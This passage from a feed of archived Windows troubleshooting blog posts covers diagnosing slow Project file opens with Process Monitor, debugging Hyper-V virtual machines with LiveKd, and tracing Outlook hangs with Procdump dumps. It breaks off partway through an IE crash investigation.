href="#" target="_blank"> Process Monitor </A> and Network Monitor traces of a slow file open. After receiving the log a short time later, he opened the log and set a filter to include only operations issued by the Project process and then another filter to include paths that referenced the target file share, \\DBG.ADS.COM\LON-USERS-U. The File Summary dialog, which he opened from Process Monitor’s Tools menu, showed significant time spent in file operations accessing files on the share, shown in the File Time column: </P> <P> <IMG alt="image" border="0" height="174" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2337.image_5F00_thumb_5F00_005354D4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121251i2CA98503F43227FA" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The paths in the trace revealed that the user profiles were stored on the file server and that the launch of Project caused heavy access of the profile’s AppData subdirectory. If many users had their profiles stored on the same server via folder redirection and were running similar applications that used stored data in AppData, that would surely account for at least some of the delays the user was experiencing. It’s well known that redirecting the AppData directory can result in performance problems, so based on this, the support engineer arrived at his first recommendation: for the company to configure their roaming user profiles to not redirect AppData and to sync the AppData directory only at logon and logoff as per the guidance found in this Microsoft <A href="#" target="_blank"> blog post </A> : </P> <BLOCKQUOTE> <P> <EM> Special considerations for AppData\Roaming folder: <BR /> If the AppData folder is redirected, some applications may experience performance issues because they will be accessing this folder over the network. If that is the case, it is recommended that you configure the following Group Policy setting to sync the AppData\Roaming folder only at logon and logoff and use the local cache while the user is logged on. While this may have an impact on logon/logoff speeds, the user experience may be better since applications will not freeze due to network latency. </EM> </P> <P> <EM> User configuration&gt;Administrative Templates&gt;System&gt;User Profiles&gt;Network directories to sync at Logon/Logoff. </EM> </P> <P> <EM> If applications continue to experience issues, you should consider excluding AppData from Folder Redirection – the downside of doing so is that it may increase your logon/logoff time. </EM> </P> </BLOCKQUOTE> <P> Next, the engineer examined the trace to see if Project was responsible for all the traffic to files like Global.MPT, or if an add-in was responsible. This is where the stack trace was indispensible. After setting a filter to show just accesses to Global.MPT, the file that accounted for most of the I/O time as shown by the summary dialog, he noticed that it was opened and read multiple times. First, he saw 5 or 6 long runs of small random reads: </P> <P> <IMG alt="image" border="0" height="334" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7450.image_5F00_thumb_5F00_7A26B405.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121252i05C92BAC8D77078B" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="484" /> </P> <P> The stacks for these operations showed that Project itself was responsible, however: </P> <P> <IMG alt="image" border="0" height="414" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3617.image_5F00_thumb_5F00_37F89C33.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121253i17182087A10E39CC" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="334" /> </P> <P> He also saw sequences of large, non-cached reads. The small reads he looked at first were cached, so there would be no network access after the first read caused the data to cache locally, but non-cached reads would go to the server every time, making them much more likely to impact performance: </P> <P> <IMG alt="image" border="0" height="286" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4810.image_5F00_thumb_5F00_785BB271.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121254i20AC430DC1A110FC" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To make matters worse, he saw this sequence six times in the trace, which you can see with a filter set to just show the initial read of each sequence: </P> <P> <IMG alt="image" border="0" height="91" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7140.image_5F00_thumb_5F00_05C1C578.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121255i5A9975C7A174535D" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The stacks for these reads revealed them to be the result of a third-party driver, which was visible by the fact that the stack trace dialog, which he’d configured to obtain symbols from Microsoft’s public symbol servers, showed no symbol information: </P> <P> <IMG alt="image" border="0" height="342" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7433.image_5F00_thumb_5F00_57A775FB.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121256iEAC3EB7774CEBAD4" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> Further, the stack frames higher up the same stack showed that the sequence of reads were being performed within the context of Project opening the file, which is a behavior common to on-access virus scanners: </P> <P> <IMG alt="image" border="0" height="284" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6431.image_5F00_thumb_5F00_3E3F72C1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121257i73C723A7AE9BA5BA" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> Sure enough, double-clicking on one of the SRTSP64.SYS lines in the stack dialog confirmed that it was Symantec AutoProtect that was repeatedly performing on-access virus detection each time Project opened the file with certain parameters: </P> <P> <IMG alt="image" border="0" height="206" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5618.image_5F00_thumb_5F00_302C5431.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121258iAEA746D3921E4BF9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="356" /> </P> <P> Typically, administrators configure antivirus on file servers, so there’s no need for clients to scan files they reference on servers since client-side scanning simply results in duplicative scans. This lead to the support engineer’s second recommendation, which was for the administrator to set an exclusion filter on their client antivirus deployment for the file share hosting user profiles. </P> <P> In less than fifteen minutes the engineer had written up his analysis and recommendations and sent them back to the customer. The network monitor trace merely served as confirmation of what he observed in the Process Monitor trace. The administrator proceeded to implement the suggestions and a few days later confirmed that the user was no longer experiencing long file loads or the errors they had reported. Another case closed with Process Monitor and thread stacks. </P> </BODY></HTML> Thu, 27 Jun 2019 07:07:07 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-project-file-opens/ba-p/723952 MarkRussinovich 2019-06-27T07:07:07Z LiveKd for Virtual Machine Debugging https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/livekd-for-virtual-machine-debugging/ba-p/723942 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 09, 2010 </STRONG> <BR /> <P> When <A href="#" target="_blank"> Dave Solomon </A> and I were writing the 3 <SUP> rd </SUP> edition of the Windows Internals book series <I> <A href="#" target="_blank"> Inside Windows 2000 </A> </I> back in 1999, we pondered if there was a way to enable kernel debuggers like Windbg and Kd (part of the free Debugging Tools for Windows package that’s available in the <A href="#" target="_blank"> Windows Platform SDK </A> ) to provide a local interactive view of a running system. Dave had introduced kernel debugger experiments in the 2nd edition, <I> <A href="#" target="_blank"> Inside Windows NT, </A> </I> that solidified the concepts presented by the book. For example, the chapter on memory management describes the page frame database, the data structure the system uses to keep track of the state of every page of physical memory, and an accompanying experiment shows how to view the actual data structure definition and contents of PFN entries on a running system using the kernel debugger. At the time, however, the only way to use Windbg and Kd to view kernel information was to attach a second computer with a serial “null modem” cable to the target system booted in debugging mode. The inconvenience of having to purchase an appropriate serial cable and configure two systems for kernel debugging meant that many readers skipped the experiments, but otherwise might have followed along and deepened their understanding if it was easier. </P> <P> After giving it some thought, I realized that I could fool the debuggers into thinking that they were looking at a crash dump file by implementing a file system filter driver that presented a “virtual” crash dump file debuggers could open. Since a crash dump file is simply a file header followed by the contents of physical memory, the driver could satisfy reads of the virtual dump file with the contents of physical memory, which the driver could easily read from the \Device\Physical Memory section object the memory manager creates. A couple of weeks later, <A href="#" target="_blank"> LiveKd </A> was born. We expanded the number of kernel debugger experiments in the book and began using LiveKd in our live Windows Internals seminars and classes as well.&nbsp; LiveKd’s usage went beyond merely being an educational tool and over time became an integral part of IT pros and Microsoft support engineers troubleshooting toolkit. Microsoft even added local kernel debugging capability to Windows XP, but LiveKd can still do a few things that the native support can’t, like saving a copy of the system’s state to a dump file that can <FONT color="#000000"> be examined on a different system and it works </FONT> <A> <FONT color="#000000"> on Windows Vista/Server 2008 and higher without requiring the system to be booted in debug mode </FONT> </A> <FONT color="#000000"> . </FONT> </P> <H3> Virtual Machine Troubleshooting </H3> <P> The rise of virtualization has introduced a new scenario for live kernel debugging: troubleshooting virtual machines. While LiveKd works just as well inside a virtual machine as on a native installation, the ability to examine a running virtual machine without having to install and run LiveKd in the machine would add additional convenience and make it possible to troubleshoot virtual machines that are unresponsive or experiencing issues that would make it impossible to even launch LiveKd. Over the last few years I received requests from Microsoft support engineers for the feature and had started an initial investigation of the approach I’d take to add the support to LiveKd, but I hadn’t gotten around to finishing it. </P> <P> Then a couple of months ago, I came across Matthieu Suiche’s <A href="#" target="_blank"> LiveCloudKd </A> tool, which enables Hyper-V virtual machine debugging and showed that there was general interest in the capability. We were so impressed that we invited Matthieu to speak about live kernel debugging and LiveCloudKd at this year’s <A href="#" target="_blank"> BlueHat Security Briefings </A> , held every year on Microsoft’s campus and taking place this week where I met him. Spurred on by LiveCloudKd, I decided it was time to finish the LiveKd enhancements and sent an email to Ken Johnson, formerly Skywing of <A href="#" target="_blank"> Uninformed.org </A> and now a developer in Microsoft’s security group (he had published articles revealing holes in 64-bit Windows “Patchguard” kernel tampering protection several times, so we hired him to help make Windows more secure), asking if he was interested in collaborating. Ken had previously contributed some code to LiveKd that enabled it to run on 64-bit Windows Vista and Windows 7 systems, so working with him was certain to speed the project – little did I know how much. He responded that he’d prototyped a tool for live virtual machine debugging a year before and thought he could incorporate it into LiveKd in a few days. Sure enough, a few days later and the beta of LiveKd 5.0 was finished, complete with the Hyper-V live debugging feature. </P> <P> We picked this week to publish it to highlight Matthieu’s tool, which offers some capabilities not present in LiveKd. For example, just like it does for local machine debugging, LiveKd provides a read-only view of the target virtual machine, whereas LiveCloudKd lets you modify it as well. </P> <H3> LiveKd Hyper-V Debugging </H3> <P> LiveKd’s Hyper-V support introduces three new command line switches, -p, -hv, and -hvl: </P> <P> <IMG alt="image" border="0" height="238" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8512.image_5F00_thumb_5F00_57279256.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121247i432272B7F2425BA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> When you’re want to troubleshoot a virtual machine, use –hvl to list the names and IDs of the ones that are active: </P> <P> <IMG alt="image" border="0" height="185" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3386.image_5F00_thumb_5F00_72A578C3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121248i1570058FDCCD16C3" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Next, use the -hv switch to specify the one you want to examine. You can use either the GUID or the virtual machine’s name, but it’s usually more convenient to use the name if it’s unique: </P> <P> <IMG alt="image" border="0" height="407" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1541.image_5F00_thumb_5F00_79588246.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121249iEBBE0A263368512E" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> And that’s all there is to it. You can now perform the same commands as you can when using LiveKd on a native system, listing processes and threads, dumping memory, and generating crash dump files for later analysis. </P> <P> The final switch, -p, pauses the virtual machine while LiveKd is connected. Normally, LiveKd reads pages of physical memory as they’re referenced by the debugger, which means that different pages can represent different points in time. That can lead to inconsistencies, for example, when you view a data structure on a page and then later one the structure references since second structure might have since been deleted. The pause option simply automates the Pause operation you can perform in the Hyper-V Virtual Machine management interface, giving you a frozen-in-time view of the virtual machine while you poke around. </P> <P> Have fun debugging virtual machines and please share any troubleshooting success stories that make use of LiveKd’s new capabilities. </P> </BODY></HTML> Thu, 27 Jun 2019 07:06:02 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/livekd-for-virtual-machine-debugging/ba-p/723942 MarkRussinovich 2019-06-27T07:06:02Z The Compound Case of the Outlook Hangs https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-compound-case-of-the-outlook-hangs/ba-p/723936 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 21, 2010 </STRONG> <BR /> <P> This case was shared with me by a friend of mine, Andrew Richards, a Microsoft Exchange Server Escalation Engineer. It’s a really interesting case because it highlights the use of a Sysinternals tool I specifically wrote for use by Microsoft support services and it’s actually two cases in one. </P> <BR /> <P> The case unfolds with a systems administrator at a corporation contacting Microsoft support to report that users across their network were complaining of Outlook hangs lasting up to 15-minutes. The fact that multiple users were experiencing the problem pointed at an Exchange issue, so the call was routed to Exchange Server support services. </P> <BR /> <P> The Exchange team has developed a Performance Monitor data collector set that includes several hundred counters that have proven useful for troubleshooting Exchange issues, including LDAP, RPC and SMTP message activity, Exchange connection counts, memory usage and processor usage. Exchange support had the administrator collect a log of the server’s activity with 12 hour log cycles, the first from 9pm until 9am the next morning. When Exchange support engineers viewed the log, two patterns were clear despite the heavy density of the plots: first and as expected, the Exchange server’s load increased during the morning when users came into work and started using Outlook; and second, the counter graphs showed a difference in behavior between about 8:05 and 8:20am, a duration that corresponded exactly to the long delays users were reporting: </P> <BR /> <P> <IMG alt="image" border="0" height="169" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5670.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121237iE7B55FFF3A54AF7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> The support engineers zoomed in and puzzled over the counters in the timeframe and could see Exchange’s CPU usage drop, the active connection count go down, and outbound response latency drastically increase, but they were unable to identify a cause: </P> <BR /> <P> <IMG alt="image" border="0" height="424" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5582.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121238i3EB5654A990E0F63" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> They escalated the case to the next level of support and it was assigned to Andrew. Andrew studied the logs and concluded that he needed additional information about what Exchange was doing during an outage. Specifically, he wanted a process memory dump of Exchange when it was in the unresponsive state. This would contain the contents of the process address space, including its data and code, as well as the register state of the process’s threads. Dump files of the Exchange process would allow Andrew to look at Exchange’s threads to see what was causing them to stall. </P> <BR /> <P> One way to obtain a dump is to “attach” to the process with a debugger like Windbg from the <A href="#" target="_blank"> Debugging Tools for Windows package </A> (included with the Windows Software Development Kit) and execute the .dump command, but downloading and installing the tools, launching the debugger, attaching to the right process, and saving dumps is an involved procedure. Instead, Andrew directed the administrator to download the <A href="#" target="_blank"> Sysinternals Procdump </A> utility (a single utility that you can run without installing any software on the server). Procdump makes it easy to obtain dumps of a process and includes options that create multiple dumps at a specified interval. Andrew asked the administrator to run Procdump the next time the server’s CPU usage dropped so that it would generate five dumps of the Exchange Server engine process, Store.exe, spaced three seconds apart: </P> <BR /> <BLOCKQUOTE> <BR /> <P> <SPAN style="font-family: Courier New;"> <SPAN style="font-size: small;"> procdump –n 5 –s 3 store.exe c:\dumps\store_mini.dmp </SPAN> </SPAN> </P> <BR /> </BLOCKQUOTE> <BR /> <P> The next day the problem reproduced and the administrator sent Andrew the dump files Procdump had generated. When a process temporarily hangs it’s often because one thread in the process acquires a lock protecting data that other threads need to access, and holds the lock while performing some long-running operation. Andrew’s first step was therefore to check for held locks. The most commonly used intra-process synchronization lock is a <A href="#" target="_blank"> critical section </A> and the !locks debugger command lists the critical sections in a dump that are locked, the thread ID of the thread owning the lock, and the number of threads waiting to acquire it. Andrew used a similar command, !critlist from the Sieext.dll debugger extension (the public version of which, Sieextpub.dll, is downloadable from <A href="#" target="_blank"> here </A> ). The output showed that multiple threads were piled up waiting for thread 223 to release a critical section: </P> <BR /> <P> <IMG alt="image" border="0" height="67" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1781.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121239iD02AE08248755F56" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> His next step was to see what the owning thread was doing, which might point at the code responsible for the long delays. He switched to the owning thread’s register context using the ~ command and then dumped the thread’s stack with the k command: </P> <BR /> <P> <IMG alt="image" border="0" height="220" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6574.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121240iA5D97CC26E7DDCD4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> As we’ve seen in previous Case of the Unexplained cases, the debugger was unsure how to interpret the stack when it came across a stack frame pointing into Savfmsevsapi, an image for which it couldn’t obtain symbols. Most Windows images have their symbols posted on the Microsoft symbol server so this was likely a third-party DLL loaded into the Store.exe process and was therefore a suspect in the hangs. The list modules (“lm”) command dumps version information for loaded images and the&nbsp;path of the image made it obvious that Savfmsevsapi was part of Symantec’s mail security product: </P> <BR /> <P> <IMG alt="image" border="0" height="243" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7673.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121241i96CABF018AA06AEE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Andrew checked the other dumps and they all had similar stack traces. With the anecdotal evidence seeming to point at a Symantec issue, Andrew forwarded the dumps and his analysis, with the administrator’s permission, to Symantec technical support. Several hours later they reported that the dumps indeed revealed a problem with the mail application’s latest antivirus signature distribution and forwarded a patch to the administrator that would fix the bug. He applied it and continued to monitor the server to verify the fix. Sure enough, the server’s performance established fairly regular activity levels and the long delays disappeared. </P> <BR /> <P> However, over the subsequent days the administrator started to receive, albeit at a lower rate, complaints from several users that Outlook was sporadically hanging for up to a minute. Andrew asked the administrator to send a correlating 12-hour Performance Monitor capture with the Exchange data collection set, but this time there was no obvious anomaly: </P> <BR /> <P> <IMG alt="image" border="0" height="178" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0724.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121242iA979A3DAE9991829" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Wondering if the hangs would be visible in the CPU usage history of Store.exe, he removed all the counters except for Store’s processor usage counter. When he zoomed in on the morning hours when users began to login and load on the server increased, he noticed three spikes around 8:30am: </P> <BR /> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0383.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121243i0DB9B1F976AFC390" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Because the server has eight cores, the processor usage counter for an individual process has a possible range between 0 and 800, so the spikes were far from taxing the system, but definitely higher than Exchange’s typical range on that system. Zooming in further and setting the graph’s vertical scale to make the spikes more distinct, he observed that average CPU usage was always below about 75% of a single core and the spikes were 15-30 seconds long: </P> <BR /> <P> <IMG alt="image" border="0" height="385" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8371.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121244iBB9FF508BD27D3D7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="448" /> </P> <BR /> <P> What was Exchange doing during the spikes? They were too short-lived and random for the administrator to run Procdump like he had before and reliably capture dumps when they occurred. Fortunately, I designed Procdump with this precise scenario in mind. It supports several trigger conditions that when met, cause it to generate a dump. For example, you can configure Procdump to generate a dump of a process when the process terminates, when its private memory usage exceeds a certain value, or even based on the value of a performance counter you specify. Its most basic trigger, though, is the CPU usage of the process exceeding a specified threshold for a specified length of time. </P> <BR /> <P> The Performance Monitor log gave Andrew the information he needed to craft a Procdump command line that would capture dumps for future CPU spikes: </P> <BR /> <BLOCKQUOTE> <BR /> <P> <SPAN style="font-family: Courier New;"> <SPAN style="font-size: small;"> procdump.exe -n 20 -s 10 -c 75 -u store.exe c:\dumps\store_75pc_10sec.dmp </SPAN> </SPAN> </P> <BR /> </BLOCKQUOTE> <BR /> <P> The arguments configure Procdump to generate a dump of the Store.exe process when Store’s CPU usage exceeds 75% (-c 75) relative to a single core (-u) for 10 seconds (-s 10), to generate up to 20 dumps (-n 20) and then exit, and to save the dumps in the C:\Dumps directory with names that begin with “store_75pc_10sec”. The administrator executed the command before leaving work and when he checked on its progress the next morning it had finished creating 20 dump files. He emailed them to Andrew, who proceeded to study them in the Windbg debugger one by one. </P> <BR /> <P> When Procdump generates a dump because the CPU usage trigger is met, it sets the thread context in the dump file to the thread that was consuming the most CPU at the time of the dump. Since the debugger’s stack-dumping commands are relative to the current thread context, simply entering the stack dumping command shows the stack of the thread most likely to have caused a CPU spike. Over half the dumps were inconclusive, apparently captured after the spike that triggered the dump had already ended, or with threads that were executing code that obviously wasn’t directly related to a spike. However, several of the dumps had stack traces similar to this one: </P> <BR /> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1856.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121245i33F82EB5DE6311EE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="475" /> </P> <BR /> <P> The stack frame that stuck out listed Store’s EcFindRow function, which implied that the spikes were caused by lengthy database queries, the kind that execute when Outlook accesses a mailbox folder with thousands of entries. With this clue in hand, Andrew suggested the administrator create an inventory of large mailboxes and pointed him at <A href="#" target="_blank"> an article </A> the Exchange support team had written that describes how to do this for each version of Exchange: </P> <BR /> <P> <IMG alt="image" border="0" height="91" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6253.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121246iC9A333446A331D25" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Sure enough, the script identified several users with folders containing tens of thousands of items. The administrator asked the users to reduce their item count to well below 5000 (the Exchange 2003 recommendation – this has been increased in each version with a recommendation of 100,000 in Exchange 2010) by archiving the items, deleting them, or organizing them into subfolders. Within a couple of days they had reorganized the problematic folders and user complaints ceased entirely. Ongoing monitoring of the Exchange server over the following week confirmed that the problem was gone. </P> <BR /> <P> With the help of Procdump, the compound case of the Outlook hangs was successfully closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:05:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-compound-case-of-the-outlook-hangs/ba-p/723936 MarkRussinovich 2019-06-27T07:05:37Z The Case of the Random IE Crash https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-crash/ba-p/723924 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 01, 2010 </STRONG> <BR /> <P> While I long for the day when I no longer experience the effects of buggy software, there’s something rewarding about solving my own troubleshooting cases. In the process, I often come up with new techniques to add to my bag of tricks and to share with you in my “ <STRONG> Case of the Unexplained…” </STRONG> presentations and blog posts. The other day I successfully closed an especially interesting case that opened when Internet Explorer (IE) crashed as I was reading a web page: </P> <BR /> <P> <IMG alt="image" border="0" height="180" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5824.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121226iFD4EB653831639BA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="355" /> </P> <BR /> <P> Whenever I experience a crash, whether it’s the system or an application, I always take a look at it. There’s no guarantee, but many times after spending just a few minutes I find clues that point at an add-on as the cause and ultimately a fix or workaround. In most cases when it’s an application crash, the faulty process is obvious and I simply launch Windbg (from the free Debugging Tools for Windows package that comes with the Windows SDK and Windows DDK), attach it to the process, and start investigating. </P> <BR /> <P> Sometimes however, the faulting process isn’t obvious, like was the case when I saw the IE crash dialog. That’s because I was running IE8, which has a multi-process model where different tabs are hosted in different processes: </P> <BR /> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2275.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121227iA935C25F25ED4B94" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="183" /> </P> <BR /> <P> I had multiple tabs open as usual, so I had to figure out which IE process of the four that were running (in addition to the parent broker instance) was the one that had crashed. I could have taken the brute-force approach of attaching to each process in turn and searching for the faulting thread, but there’s fortunately a simpler and more direct way to identify the target process. </P> <BR /> <P> When a process crashes, the Windows Error Reporting (WER) service launches its own process, called WerFault, in the session of the crashed process to display the error dialog to the user running the session and to generate a crash dump file. So that WerFault knows which process is the one that crashed, the WER service passes the process ID (PID) of the target on WerFault’s command line. You can easily view the command line with Process Explorer. Because I always have Process Explorer running with its icon visible in the tray area of the taskbar, I clicked on the icon to open it and found the WER process in the process tree: </P> <BR /> <P> <IMG alt="image" border="0" height="81" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0624.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121228iEB6918C8C0EFA31D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="504" /> </P> <BR /> <P> I double-clicked on it to open the process properties dialog and the command line revealed the process ID of the problematic IE process: </P> <BR /> <P> <IMG alt="image" border="0" height="250" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4331.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121229iFC0137757EE70923" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> Now that I knew it was process 4440 in which I was interested, I started Windbg, pressed F6 to open the process selection dialog, and double-clicked on Iexplore.exe process 4440. With Windbg attached, my next step was to locate the thread that had faulted so that I could examine its stack for signs of a buggy add-on. In some cases, relying on Windbg’s built-in crash analysis heuristics, which you can trigger with the <EM> !analyze </EM> command, will do the job for you, but it didn’t this time. Finding the faulting thread is fairly straightforward, though. </P> <BR /> <P> First, go to Windbg’s View menu and open both the Processes and Threads and the Call Stack dialogs, arranging them side by 